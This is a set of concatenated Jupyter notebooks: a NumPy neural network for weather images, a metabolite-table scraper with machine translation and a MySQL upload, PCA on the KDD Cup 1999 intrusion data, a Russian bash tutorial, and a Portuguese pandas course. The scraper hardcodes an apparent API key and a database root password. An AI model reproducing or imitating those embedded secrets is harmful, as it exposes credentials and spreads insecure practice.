lin_predict = lin_clf.predict(X_test.tolist())
accuracy_score(y_test, lin_predict)
| notebooks/audience_overlap_node2vec_models/old_notebooks_with_older_way_of_eval/new_data_tester unweighted.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/swap-10/Dense-DNN-From-Scratch/blob/main/DenseDNNScratch.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] id="sx-MqOmAqjMR"
# # Fully Connected Deep Neural Network with NumPy
# + [markdown] id="PT-veG8Jqsyn"
# # Constructing the Neural Net
# + id="qJ6XSCYxCsL0"
import numpy as np
import matplotlib.pyplot as plt
import h5py
import scipy
import sys
import glob
import h5py
import cv2
import csv
np.random.seed()
# + id="w7p3oYdqHEb4"
def sigmoid(Z):
s = 1 / np.exp(Z)
s = 1 / (1 + s)
cache_act = Z
return s, cache_act
def sigmoid_derivative(Z):
d_sigmoid = np.multiply(Z, (1 - Z))
return d_sigmoid
def sigmoid_backprop(dA, cache_act):
Z = cache_act
dZ = np.multiply(dA, sigmoid_derivative(Z))
return dZ
def relu(Z):
r = np.maximum(0, Z)
cache_act = Z
return r, cache_act
def relu_derivative(Z):
d_relu = Z
d_relu[d_relu<=0] = 0
d_relu[d_relu>0] = 1
return d_relu
def relu_backprop(dA, cache_act):
Z = cache_act
dZ = np.multiply(dA, relu_derivative(Z))
return dZ
def softmax(Z):
cache_act = Z
s = np.exp(Z) / (np.sum(np.exp(Z), axis=0))
return s, cache_act
# + colab={"base_uri": "https://localhost:8080/"} id="bcF-BUFAPiWy" outputId="aa192c8d-6511-4cbb-927e-ac60533e0543"
a = [[1, 2],
[3, 4],
[5, 6]]
b = [[11, 12],
[13, 14],
[15, 16]]
print(np.multiply(a,b))
# + id="mpiMcZp1ELmW"
def init_params(layer_dims):
params = {}
L = len(layer_dims)
for i in range(1, L):
params[f"W%d" %i] = (np.random.randn(layer_dims[i], layer_dims[i-1]) + (1e-9)) * 0.03
params[f"b%d" %i] = np.zeros((layer_dims[i],1))
return params
# + id="q50TbswZFqZ0"
def forward_nonact(A, W, b):
Z = np.dot(W, A) + b
cache = (A, W, b)
return Z, cache
def forward_act(A_pre, W, b, activation):
if activation == "sigmoid":
Z, cache_nonact = forward_nonact(A_pre, W, b)
A, cache_act = sigmoid(Z)
elif activation == "softmax":
Z, cache_nonact = forward_nonact(A_pre, W, b)
A, cache_act = softmax(Z)
elif activation == "relu":
Z, cache_nonact = forward_nonact(A_pre, W, b)
A, cache_act = relu(Z)
cache = (cache_nonact, cache_act)
return A, cache
# + id="5fQMd2T5IRg0"
def forward_prop(X, params):
L = len(params) // 2
cache_accumulate = []
A = X # First layer
for i in range(1, L):
A_pre = A
A, cache = forward_act(
A_pre,
params[f"W%d" %i], params[f"b%d" %i],
activation="relu"
)
cache_accumulate.append(cache)
A_L, cache = forward_act(
A,
params[f"W%d" %L],
params[f"b%d" %L],
activation="softmax"
)
cache_accumulate.append(cache)
return A_L, cache_accumulate
# + id="WPgbEF2eKReg"
def compute_cost(A_L, Y):
m = Y.shape[1] # Assuming Y is in form of (1, num_of_training_examples)
cost = (-1/m) * np.sum(np.multiply(Y, np.log(A_L)), axis=1, keepdims=True) # Softmax cost
cost = np.sum(cost)
cost = np.squeeze(cost)
return cost
# + id="gZW8MRMxLsci"
def backward_nonact(dZ, cache_nonact):
A_pre, W, b = cache_nonact
m = A_pre.shape[1] # All A.shape[1] will have same value (m)
dW = (1/m) * np.dot(dZ, A_pre.T)
db = (1/m) * np.sum(dZ, axis=1, keepdims=True)
dA_pre = np.dot(W.T, dZ)
return dA_pre, dW, db
def backward_act(dA, cache, activation):
cache_nonact, cache_act = cache
if activation == "relu":
dZ = relu_backprop(dA, cache_act)
dA_pre, dW, db = backward_nonact(dZ, cache_nonact)
elif activation == "sigmoid":
dZ = sigmoid_backprop(dA, cache_act)
dA_pre, dW, db = backward_nonact(dZ, cache_nonact)
# Softmax is only used in the final layer and it's required derivative: derivative of loss w.r.t Z is much easier and more convenient to compute
# For this reason it is computed seperately in the beginning of the backward propagation step and not here
return dA_pre, dW, db
# + id="-2PXQlnIupJl"
def backward_prop(A_L, Y, cache_accumulate):
L = len(cache_accumulate)
m = A_L.shape[1]
Y = Y.reshape(A_L.shape)
grads = {}
dA_L = - (np.divide(Y, A_L)) # Softmax derivative of Y wrt activated output
cache_cur = cache_accumulate[-1]
dZ = A_L - Y # This combined with the next line gives the backward_act() for the last layer (softmax)
dA_pre_cur, dW_cur, db_cur = backward_nonact(dZ, cache_cur[0]) # cache_cur[0] is cache_nonact.
grads[f"dA%d" %(L-1)] = dA_pre_cur
grads[f"dW%d" %L] = dW_cur
grads[f"db%d" %L] = db_cur
for i in range(L-2, -1, -1):
cache_cur = cache_accumulate[i]
dA_pre_cur, dW_cur, db_cur = backward_act(dA_pre_cur, cache_cur, activation="relu")
grads[f"dA%d" %i] = dA_pre_cur
grads[f"dW%d" %(i+1)] = dW_cur
grads[f"db%d" %(i+1)] = db_cur
return grads
# + id="v76TCDib0beA"
def update_params(params, grads, learning_rate):
parameters = params.copy()
L = len(parameters) // 2
for i in range(L):
parameters[f"W%d" %(i+1)] = parameters[f"W%d" %(i+1)] - (learning_rate*grads[f"dW%d" %(i+1)])
parameters[f"b%d" %(i+1)] = parameters[f"b%d" %(i+1)] - (learning_rate*grads[f"db%d" %(i+1)])
return parameters
# + [markdown] id="b_fS0Nw91sqc"
#
#
# ---
# ---
# ---
# + [markdown] id="JcRbMBO91ybV"
# <br>
# <br>
# <br>
# <br>
# + [markdown] id="AGYMzjW6rFU3"
# [Dataset used](https://https://data.mendeley.com/datasets/4drtyfjtfy/1)
# + [markdown] id="0SOt0bGzq8OI"
# # Using the Neural Net
# + [markdown] id="G_8tB7HNrCSh"
# # Data Preparation
# + [markdown] id="wYn6vSFgrEnk"
# <h2> Careful! <h2>
# + id="4hbgSBXO43IV" language="bash"
# rm -rf downloaddata
# rm -rf dataset2
# + id="fZnTy2iI2COs" colab={"base_uri": "https://localhost:8080/"} outputId="4ce42be6-fd86-4399-d34e-c94a3f43d912" language="bash"
# mkdir downloaddata
# wget -O ./downloaddata/images.zip https://data.mendeley.com/public-files/datasets/4drtyfjtfy/files/a03e6097-f7fb-4e1a-9c6a-8923c6a0d3e0/file_downloaded | head
# unzip ./downloaddata/images.zip -d ./downloaddata
# + id="OlI6hBLWSB85" language="bash"
# touch filenames.txt
# ls ./downloaddata/dataset2/ > filenames.txt
# + id="gZ_1her5HutL" language="bash"
# a=1
# for i in ./downloaddata/dataset2/cloudy*.jpg;
# do
# new=$(printf "./downloaddata/dataset2/cloudy%04d.jpg" "$a") #04 pad to length of 4
# mv -i -- "$i" "$new"
# let a=a+1
# done
#
# a=1
# for i in ./downloaddata/dataset2/rain*.jpg;
# do
# new=$(printf "./downloaddata/dataset2/rain%04d.jpg" "$a") #04 pad to length of 4
# mv -i -- "$i" "$new"
# let a=a+1
# done
#
# a=1
# for i in ./downloaddata/dataset2/shine*.jpg;
# do
# new=$(printf "./downloaddata/dataset2/shine%04d.jpg" "$a") #04 pad to length of 4
# mv -i -- "$i" "$new"
# let a=a+1
# done
#
# a=1
# for i in ./downloaddata/dataset2/sunrise*.jpg;
# do
# new=$(printf "./downloaddata/dataset2/sunrise%04d.jpg" "$a") #04 pad to length of 4
# mv -i -- "$i" "$new"
# let a=a+1
# done
#
# + id="r36V1XW9czSt" language="bash"
# touch filenames.csv
# cd downloaddata/dataset2/
# printf "%s\n" * > ../../filenames.csv
# cd ../../
# shuf filenames.csv > filenames_shuf.csv
# head -n 901 filenames_shuf.csv > train_names.csv
# tail -n 225 filenames_shuf.csv > test_names.csv
# + [markdown] id="9GryzbWjmMRH"
# csv files containing names of shuffled data -- done
# + colab={"base_uri": "https://localhost:8080/"} id="wMEf524o8yc3" outputId="32b77f50-15fb-4f69-d2fc-3f7bd85085bf"
IMG_WIDTH = 128
IMG_HEIGHT = 128
hf = 'import_images.h5'
with open('train_names.csv', newline='\n') as f:
reader = csv.reader(f)
data = list(reader)
print(data[:100])
nfiles = len(data)
print(f'count of image files nfiles={nfiles}')
data = enumerate(data)
# resize all images and load into a single dataset
with h5py.File(hf,'w') as h5f:
img_ds = h5f.create_dataset('images_train',shape=(nfiles, IMG_WIDTH, IMG_HEIGHT,3), dtype=int)
img_labels = h5f.create_dataset('labels_train', shape=(nfiles, 1), dtype=int)
for (cnt, ifile) in data:
ifile = "./downloaddata/dataset2/" + ifile[0]
img = cv2.imread(ifile, cv2.IMREAD_COLOR)
if img is None:
continue
img_resize = cv2.resize( img, (IMG_WIDTH, IMG_HEIGHT))
img_ds[cnt:cnt+1:,:,:] = img_resize
if "cloudy" in str(ifile):
classnum = 0
elif "rain" in str(ifile):
classnum = 1
elif "shine" in str(ifile):
classnum = 2
elif "sunrise" in str(ifile):
classnum = 3
img_labels[cnt, :] = classnum
classnames = ["cloudy", "rain", "shine", "sunrise"]
# + colab={"base_uri": "https://localhost:8080/", "height": 475} id="1rJ7sp1kJEYr" outputId="a84307f5-b8dd-4623-e55a-6228ced5715b"
hfile = h5py.File(hf, 'r')
n = hfile.get('images_train')
l = hfile.get('labels_train')
print(type(n))
plt.figure(figsize=(10,10))
for i, img in enumerate(n[:10,:,:,:]):
plt.subplot(2,5,i+1)
plt.title(classnames[np.squeeze(l[i,:])])
plt.imshow(img)
hfile.close()
# + colab={"base_uri": "https://localhost:8080/"} id="oJXgvEz9rhoo" outputId="a9592ffc-1efe-4882-b165-220f31b20337"
# https://stackoverflow.com/questions/28170623/how-to-read-hdf5-files-in-python
hfile.close()
hfile = h5py.File(hf, 'r')
i=0
for key in hfile.keys():
print(key)
group1 = hfile['images_train']
train_images = group1[:]
train_images = np.array(train_images)
print(type(train_images))
print(train_images.shape)
train_images = train_images.reshape(IMG_WIDTH*IMG_HEIGHT*3, -1)
print(train_images.shape)
print(train_images)
group2 = hfile['labels_train']
train_labels = group2[:]
train_labels = np.array(train_labels)
print(type(train_labels))
print(train_labels.shape)
train_labels = train_labels.reshape(1, 901)
print(train_labels.shape)
print(train_labels)
hfile.close()
# + colab={"base_uri": "https://localhost:8080/"} id="ouvp-yNO52-8" outputId="9367a9a1-0cc5-4c0f-9327-6d26cb66a9bb"
layer_dims = [49152, 50, 20, 5, 4]
train_labels = np.multiply(train_labels, np.ones((4, train_labels.shape[1])))
print(train_labels.shape)
print(type(train_labels))
print(train_labels)
# + colab={"base_uri": "https://localhost:8080/"} id="UN9I76skFaLJ" outputId="9b3d847b-b27d-4540-9270-be3cb7b5ed8c"
for i in range(train_labels.shape[0]):
train_labels[i] = [(i==val) for val in train_labels[i]]
print(train_labels.shape)
print(train_labels[0])
# + id="-UA8k7q37Knu"
def model(X, Y, layer_dims, learning_rate=0.001, num_iters=3000, print_cost=False):
np.random.seed(0)
costs = []
params = init_params(layer_dims)
for i in range(0, num_iters):
A_L, cache_accumulate = forward_prop(X, params)
cost = compute_cost(A_L, Y)
grads = backward_prop(A_L, Y, cache_accumulate)
params = update_params(params, grads, learning_rate)
if print_cost and i % 10 == 0 or i == num_iters - 1:
print("Cost after iteration {}: {}".format(i+1, np.squeeze(cost)))
if i % 100 == 0 or i == num_iters - 1:
costs.append(cost)
return params, costs
# + colab={"base_uri": "https://localhost:8080/"} id="OGR8J3q58xqb" outputId="26534e3e-fe5a-4c36-cdbc-5149e73f43a8"
params, costs = model(train_images, train_labels, layer_dims, num_iters=1, print_cost=False)
# + id="lBrmY3EXqXlQ" colab={"base_uri": "https://localhost:8080/"} outputId="3b1634c0-f907-4c1e-dcf7-8ccb567605f9"
params, costs = model(train_images, train_labels, layer_dims, learning_rate=0.002, num_iters=1500, print_cost=True)
# + id="GfYdegzWdkjf"
| DenseDNNScratch.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
from IPython.core.display import display, HTML
display(HTML("<style>.container { width:100% !important; }</style>"))
import pandas as pd
pd.set_option('display.max_columns', None)
pd.set_option('display.max_rows', None)
# +
from bs4 import BeautifulSoup
import requests
import lxml.html as lh
url = "http://www.knapsackfamily.com/DietNavi/result3.php"
soup = BeautifulSoup(requests.get(url).content, 'html.parser')
stuff = []
for row in soup.select('table.list1 tr'):
tds = [td.get_text(strip=True) for td in row.select('td, th')]
stuff.append(tds)
for i in range(10):
print(stuff[i])
#5 cols with first sublist being table header
# each sublist of strings
# +
import copy
print("\n\nrows of dicts")
# third and fourth elements are EN
count = 0
table_headers = stuff[0]
col_metabollites = table_headers[0]
col_eng_names = table_headers[1]
col_health_effects = table_headers[2]
col_foods = table_headers[3]
col_citations= table_headers[4]
# make a list of dicts
df_rows = []
num_cols = 5
df_row = []
row_dict = {}
#organize all rows in packs of 13 for a row in df
for i in range(1, len(stuff)):
row = stuff[i]
row_dict[col_metabollites] = row[0]
row_dict[col_eng_names] = row[1]
row_dict[col_health_effects] = row[2]
row_dict[col_foods] = row[3]
row_dict[col_citations] = row[4]
df_rows.append(copy.deepcopy(row_dict))
row_dict.clear()
# check that df_rows is a list of dicts of each row: {col name: value}
#for i in range(len(df_rows)):
for i in range(3):
print(f'{i}\n{df_rows[i]}')
# -
metabollites_df = pd.DataFrame(df_rows)
print(metabollites_df.head())
print(metabollites_df.columns)
# write to csv
filename = 'knapsack_metabollites.csv'
metabollites_df.to_csv(filename)
# # Translate to English and upload to Mysql
import pandas as pd
import requests
#read csv to dataframe
metabollites_df = pd.read_csv('knapsack_metabollites.csv')
del metabollites_df['Unnamed: 0']
#print(metabollites_df.head())
print(metabollites_df[:3]['含まれる食品'])
print(metabollites_df.head())
print(f'columns: {metabollites_df.columns}')
table_cols = ['metabollite', 'enName', 'healthEffect', 'foods', 'citations']
#direct to myMemory
myEmail = '<EMAIL>'
myMemoryKey = 'e6a399ee8db646c17484'
ja_text = '強くする'
langpair = 'ja|en'
#params = dict(key=myMemoryKey, text=ja_text, langpair=langpair )
url = f'https://api.mymemory.translated.net/get?q={ja_text}&langpair={langpair}&key={myMemoryKey}&de={myEmail}'
from tqdm import tqdm
copy_metabollites_df = metabollites_df.copy()
cols = metabollites_df.columns.tolist()
for i in tqdm(range(len(metabollites_df.index))):
for col in cols[:-1]:
ja_cell_val = metabollites_df[col][i]
if ja_cell_val is not 'nan':
#en_transl = getTranslate(ja_cell_val, src='ja', dest='en')
url = url = f'https://api.mymemory.translated.net/get?q={ja_cell_val}&langpair={langpair}&key={myMemoryKey}&de={myEmail}'
res = requests.get(url)
json = res.json()
en_text = json['responseData']['translatedText']
#en_text = en_transl.texy
#print(en_text[:5])
copy_metabollites_df[col][i] = en_text
else:
copy_metabollites_df[col][i] = ja_cell_val
copy_metabollites_df
#save en version to csv
filename ='en_knapsack_metabollites.csv'
copy_metabollites_df.to_csv(filename)
metabollites_df = pd.read_csv('en_knapsack_metabollites.csv')
del metabollites_df['Unnamed: 0']
metabollites_df.columns = table_cols
print(metabollites_df.columns, metabollites_df.head())
# +
from sqlalchemy import create_engine
engine = create_engine("mysql+pymysql://root:tennis33@localhost/bioactiveKnapsack?charset=utf8mb4")
# +
#rename columns
#del metabollites_df['Unnamed: 0']
print(metabollites_df.columns)
metabollites_df.columns = table_cols
print(metabollites_df.columns)
# -
metabollites_df.to_sql('metabollites', con=engine, if_exists='append', chunksize=1000, index=False)
| 1_foodsByNutrients/knapsackMetabollitesDietNavi.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import pandas as pd
import numpy as np
from sklearn import *
import matplotlib.pyplot as plt
from mlxtend.plotting import plot_decision_regions
# %matplotlib inline
# -
df = pd.read_csv("/data/kddcup.data", header=None)
df.head()
# +
columns = [f.split(":")[0] for f in """
duration: continuous.
protocol_type: symbolic.
service: symbolic.
flag: symbolic.
src_bytes: continuous.
dst_bytes: continuous.
land: symbolic.
wrong_fragment: continuous.
urgent: continuous.
hot: continuous.
num_failed_logins: continuous.
logged_in: symbolic.
num_compromised: continuous.
root_shell: continuous.
su_attempted: continuous.
num_root: continuous.
num_file_creations: continuous.
num_shells: continuous.
num_access_files: continuous.
num_outbound_cmds: continuous.
is_host_login: symbolic.
is_guest_login: symbolic.
count: continuous.
srv_count: continuous.
serror_rate: continuous.
srv_serror_rate: continuous.
rerror_rate: continuous.
srv_rerror_rate: continuous.
same_srv_rate: continuous.
diff_srv_rate: continuous.
srv_diff_host_rate: continuous.
dst_host_count: continuous.
dst_host_srv_count: continuous.
dst_host_same_srv_rate: continuous.
dst_host_diff_srv_rate: continuous.
dst_host_same_src_port_rate: continuous.
dst_host_srv_diff_host_rate: continuous.
dst_host_serror_rate: continuous.
dst_host_srv_serror_rate: continuous.
dst_host_rerror_rate: continuous.
dst_host_srv_rerror_rate: continuous.
""".split("\n") if len(f)>0]
columns.append("Category")
print(columns)
# -
df.columns = columns
df.info()
X = df.select_dtypes(include=[np.float64, np.int64]).values
y = df.Category
y.value_counts()
# +
# %%time
y = np.where(df.Category == "normal.", 0, 1)
X = df.select_dtypes(include=[np.float64, np.int64]).values
X_train, X_test, y_train, y_test = model_selection.train_test_split(X, y,
test_size = 0.3, random_state = 12345)
scaler = preprocessing.StandardScaler()
X_train_std = scaler.fit_transform(X_train)
X_test_std = scaler.transform(X_test)
print("X_train", X_train.shape, "X_test", X_test.shape)
# -
pd.Series(y_train).value_counts()/len(y_train)
# %%time
pca = decomposition.PCA(random_state=1)
pca.fit(X_train_std)
fig, ax = plt.subplots()
ax.bar(range(X_train_std.shape[1]), pca.explained_variance_ratio_)
ax.plot(range(X_train_std.shape[1]), np.cumsum(pca.explained_variance_ratio_))
plt.xlabel("PC components")
plt.ylabel("Variance retention")
pd.DataFrame({"retention": np.cumsum(pca.explained_variance_ratio_)})\
.query("retention>0.99")[:3]
# %%time
pca = decomposition.PCA(random_state=1, n_components=23)
X_train_pca = pca.fit_transform(X_train_std)
X_test_pca = pca.transform(X_test_std)
X_train_pca.shape, X_test_pca.shape, y_train.shape, y_test.shape
# %%time
est = linear_model.LogisticRegression()
est.fit(X_train_std, y_train)
print("Training accuracy:", est.score(X_train_std, y_train),
"Test accuracy:", est.score(X_test_std, y_test))
# %%time
est = linear_model.LogisticRegression()
est.fit(X_train_pca, y_train)
print("Training accuracy:", est.score(X_train_pca, y_train),
"Test accuracy:", est.score(X_test_pca, y_test))
| Scikit - PCA (kdd cup 1999).ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Terminal
#
# Мы находимся в среде разработки **Jupyter notebook**, которая запущена на компе с системой **Linux** (Ubuntu)
# Эта среда предназначена для напиания кода на языке программирования **Python**.
# ## Создаем свой notebook
#
# откройте в новой вкладке или в новом окне ссылку: http://172.16.58.3:9999/
#
# потом создайте свой файл, нажав на кнопку **New** > **Python 3**
# 
#
# потом он откроется, вверху жмем на надпись **Untitled**, переименовываем под свое имя, как тут:
#
# 
# ## как в нем работать?
#
# пишем команду, нажимаем **shift+Enter** - она выполняется
2+2 # Это Python, оно как и почти все языки программирования может считать
# Выше введена **python** команда, а в Out мы видим результат ее выполнения.
# Но до **python** мы доберемся позже. Сейчас нам нужен **terminal** и **bash**.
# **bash** - это та штука, которая может управлять компом через свои команды. Это командный интерпритатор.
#
# **sh** - это shell (оболочка).
#
# Можно сказать, что **bash** - это тоже самое, что и **sh**, только более продвинутый и новый, с бОльшими возможнотями.
# ### Команды терминала
# Для выполенний команд терминала в **jupyter** нужно впереди писать ! - восклицательный знак
# !pwd
# **pwd** - *print working directory* (напечатать рабочую директорию). то есть вывести текущую папку, в которой мы находимся
#
# вывелось:
#
# **/home/test/jupyter/Материалы**
# !ls
# Содержание текущей папки
# !ls --help
# Попросили хелп по этой команде, можем почитать, как ей пользоваться
# !man ls
# почти такой же help. man - manual (руководство)
# !mkdir new_dir
# !ls
# создали новую папку, убедились, что она появилась
# !touch new_dir/new_file
# !ls new_dir
# создали новый файл (new_file) в папке new_dir, убедились, что он там появился
# !ls -l
# !ls -l new_dir
# вывели содержание папок с ключем -l, который выводит в формате листа
# !ls -la
# с ключем -a видим еще и скрытые файлы
# ## напишем bash скрипт
# для начала научимся писать в файл и читать файл
# !cat new_dir/new_file
# В файле пусто, потом что мы его недавно создали
# !echo "#!/bin/bash" > new_dir/new_file
# Этой командой мы записали строку #!/bin/bash в файл
# !cat new_dir/new_file
# читаем - действительно
# !echo "ls" > new_dir/new_file
# !cat new_dir/new_file
# испльзуя команду повторно, мы перезаписали содержание файла
# !echo "#!/bin/bash" > new_dir/new_file
# вернули, как было
# !echo "ls" >> new_dir/new_file
# !cat new_dir/new_file
# смогли дописать в конец
# !./new_dir/new_file
# файл **new_file** уже можно счиать **bash-скриптом**, который при запуске выведет нам содержание папки
# для его запуска в начале нужно допиcать **./** - точка слеш
# попытались, но в ответ нам пишет **/bin/bash: ./new_dir/new_file: Permission denied**
#
# То есть у нас нет разрешения
#
# !ls -la new_dir
# возле нашего файла мы видим это
#
# -rw-rw-r--
#
# Это значит что для владельца файла разрешено rw (read write - читать, писать), для администратора разрешено rw, а для всех остальных только r - чтение.
#
# То есть этот файл разрешено читать и изменять, но ВЫПОЛНЯТЬ пока что нельзя.
#
# Дадим разрешения:
# !chmod +x new_dir/new_file
# !ls -la new_dir
# теперь у нас появились x - разрешения на выполнение
# !./new_dir/new_file
# теперь наш скрипт запускается
# Можно писать в файл через другую команду **printf** в многострочном режиме:
# + language="bash"
#
# printf "
# touch new_file_2
# ls -la
# " >> new_dir/new_file
# -
# Как можно заметить выше, можно вместо восклицательного знака ставить **%%bash** в начале ячейки. Так мы даем понять, что всё содержимое ячейки - команда bash
# !cat new_dir/new_file
# Чтобы написать скрипт полностью, лучше воспользоваться командой **nano**. Это текстовый редактор.
#
# в терминале пишем
#
# nano script.sh
# !ls -la
# !cat script.sh
# !./script.sh
# !ls -la
# !cat journal.txt
# !./script.sh
# !cat journal.txt
# !./script.sh
# !./script.sh
# !./script.sh
# !cat journal.txt
| Terminal.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] id="W4bTJkJED0-t" colab_type="text"
# # <font color=green> PYTHON PARA DATA SCIENCE - PANDAS
# ---
# + [markdown] id="GOEcCc62D0-x" colab_type="text"
# # <font color=green> 1. INTRODUÇÃO AO PYTHON
# ---
# + [markdown] id="oGvoOJ-XD0-y" colab_type="text"
# # 1.1 Introdução
# + [markdown] id="fam3BM0aD0-z" colab_type="text"
# > Python é uma linguagem de programação de alto nível com suporte a múltiplos paradigmas de programação. É um projeto *open source* e desde seu surgimento, em 1991, vem se tornando uma das linguagens de programação interpretadas mais populares.
# >
# > Nos últimos anos Python desenvolveu uma comunidade ativa de processamento científico e análise de dados e vem se destacando como uma das linguagens mais relevantes quando o assundo é ciência de dados e machine learning, tanto no ambiente acadêmico como também no mercado.
# + [markdown] id="6kH5DY-vD0-1" colab_type="text"
# # 1.2 Instalação e ambiente de desenvolvimento
# + [markdown] id="BTpm79I2D0-2" colab_type="text"
# ### Instalação Local
#
# ### https://www.python.org/downloads/
# ### ou
# ### https://www.anaconda.com/distribution/
# + [markdown] id="AuPS_XwRD0-3" colab_type="text"
# ### Google Colaboratory
#
# ### https://colab.research.google.com
# + [markdown] id="4rUYsPrXD0-4" colab_type="text"
# ### Verificando versão
# + id="PgTCVRB2D0-5" colab_type="code" colab={}
# + [markdown] id="lTtI6so4D0-9" colab_type="text"
# # 1.3 Trabalhando com dados
# + id="E_n4FUUWD0-9" colab_type="code" colab={}
# + id="Kq-JdRHFD0-_" colab_type="code" colab={}
# + id="mOV1rCA6D0_A" colab_type="code" colab={}
# + id="5D739PzJD0_B" colab_type="code" colab={}
# + id="r_qUf16LD0_D" colab_type="code" colab={}
# + id="0R-_7PH5D0_E" colab_type="code" colab={}
# + [markdown] id="htjoBLwiD0_F" colab_type="text"
# # <font color=green> 2. TRABALHANDO COM TUPLAS
# ---
# + [markdown] id="MZH5_QnYD0_G" colab_type="text"
# # 2.1 Criando tuplas
#
# Tuplas são sequências imutáveis que são utilizadas para armazenar coleções de itens, geralmente heterogêneos. Podem ser construídas de várias formas:
# ```
# - Utilizando um par de parênteses: ( )
# - Utilizando uma vírgula à direita: x,
# - Utilizando um par de parênteses com itens separados por vírgulas: ( x, y, z )
# - Utilizando: tuple() ou tuple(iterador)
# ```
# + id="xzcs9fzeD0_G" colab_type="code" colab={}
# + id="qJq7a2qTD0_I" colab_type="code" colab={}
# + id="sg7LdvptD0_J" colab_type="code" colab={}
# + id="XSSMebXjD0_K" colab_type="code" colab={}
['Jetta Variant', 'Passat', 'Crossfox', 'DS5']
# + id="dpkdzrzRD0_M" colab_type="code" colab={}
# + [markdown] id="iKUY2DOUD0_N" colab_type="text"
# # 2.2 Seleções em tuplas
# + id="hBEeAM7_D0_N" colab_type="code" colab={}
# + id="-mx_1E_tD0_P" colab_type="code" colab={}
# + id="LMhyqnFID0_Q" colab_type="code" colab={}
# + id="6btHff4BD0_T" colab_type="code" colab={}
# + id="K_Dc12xBD0_U" colab_type="code" colab={}
# + id="zvrWYkkeD0_W" colab_type="code" colab={}
nomes_carros = ('Jetta Variant', 'Passat', 'Crossfox', 'DS5', ('Fusca', 'Gol', 'C4'))
nomes_carros
# + id="Dw7tbM2ED0_Z" colab_type="code" colab={}
# + id="SAMD3BtXD0_b" colab_type="code" colab={}
# + [markdown] id="KLMxh4-0D0_c" colab_type="text"
# # 2.3 Iterando em tuplas
# + id="K53elKsYD0_c" colab_type="code" colab={}
nomes_carros = ('Jetta Variant', 'Passat', 'Crossfox', 'DS5')
nomes_carros
# + id="igZhZ5zdD0_d" colab_type="code" colab={}
# + [markdown] id="AOBjxBk8D0_f" colab_type="text"
# ### Desempacotamento de tuplas
# + id="UoEFnumhD0_f" colab_type="code" colab={}
# + id="AaCLcNYTD0_g" colab_type="code" colab={}
# + id="TA71S9egD0_h" colab_type="code" colab={}
# + id="CHoJ034MD0_i" colab_type="code" colab={}
# + id="oxJrOuCSD0_j" colab_type="code" colab={}
# + id="BbR9sB4BD0_k" colab_type="code" colab={}
# + id="aZvokrjPD0_m" colab_type="code" colab={}
# + id="wZXDbVg0D0_o" colab_type="code" colab={}
# + id="aWgDMBXiD0_p" colab_type="code" colab={}
# + id="OdpgNh-ND0_q" colab_type="code" colab={}
# + id="upVYFnMdD0_r" colab_type="code" colab={}
# + [markdown] id="u85Aou8WD0_s" colab_type="text"
# ## *zip()*
#
# https://docs.python.org/3.6/library/functions.html#zip
# + id="PaC2oXGED0_t" colab_type="code" colab={}
carros = ['Jetta Variant', 'Passat', 'Crossfox', 'DS5']
carros
# + id="_02O1VnHD0_u" colab_type="code" colab={}
valores = [88078.64, 106161.94, 72832.16, 124549.07]
valores
# + id="roQK5nYRD0_v" colab_type="code" colab={}
# + id="_WRxIRHrD0_w" colab_type="code" colab={}
# + id="2zIuhIILD0_x" colab_type="code" colab={}
# + id="ZJaL62IpD0_y" colab_type="code" colab={}
# + [markdown] id="xo76nR8rD0_0" colab_type="text"
# # <font color=green> 3. TRABALHANDO COM DICIONÁRIOS
# ---
# + [markdown] id="wfWzOuztD0_0" colab_type="text"
# # 3.1 Criando dicionários
#
# Listas são coleções sequenciais, isto é, os itens destas sequências estão ordenados e utilizam índices (números inteiros) para acessar os valores.
#
# Os dicionários são coleções um pouco diferentes. São estruturas de dados que representam um tipo de mapeamento. Mapeamentos são coleções de associações entre pares de valores onde o primeiro elemento do par é conhecido como chave (*key*) e o segundo como valor (*value*).
#
# ```
# dicionario = {key_1: value_1, key_2: value_2, ..., key_n: value_n}
# ```
#
# https://docs.python.org/3.6/library/stdtypes.html#typesmapping
# + id="SuPcV9v6D0_0" colab_type="code" colab={}
# + id="YIFVkWT6D0_1" colab_type="code" colab={}
carros = ['Jetta Variant', 'Passat', 'Crossfox']
carros
# + id="2LHiBn3-D0_2" colab_type="code" colab={}
valores = [88078.64, 106161.94, 72832.16]
valores
# + id="YxLAx_sqD0_4" colab_type="code" colab={}
# + id="WITNWExID0_7" colab_type="code" colab={}
# + id="bHNqoDbTD0_8" colab_type="code" colab={}
# + id="4FyQgmcAD0_9" colab_type="code" colab={}
# + [markdown] id="PQg-MLkGD0_-" colab_type="text"
# ### Criando dicionários com *zip()*
# + id="iB4Q_gbND0__" colab_type="code" colab={}
# + id="mIgZqdKKD1AA" colab_type="code" colab={}
# + [markdown] id="KYeRqavFD1AD" colab_type="text"
# # 3.2 Operações com dicionários
# + [markdown] id="KzmWbEltD1AD" colab_type="text"
# ## *dict[ key ]*
#
# Retorna o valor correspondente à chave (*key*) no dicionário.
# + id="hFFDz6wKD1AD" colab_type="code" colab={}
# + [markdown] id="SWlE6VTBD1AE" colab_type="text"
# ## *key in dict*
#
# Retorna **True** se a chave (*key*) for encontrada no dicionário.
# + id="Iy88SxBtD1AE" colab_type="code" colab={}
# + id="Oma56NkAD1AF" colab_type="code" colab={}
# + id="yS2U-_8gD1AG" colab_type="code" colab={}
# + [markdown] id="oWbWyDd0D1AI" colab_type="text"
# ## *len(dict)*
#
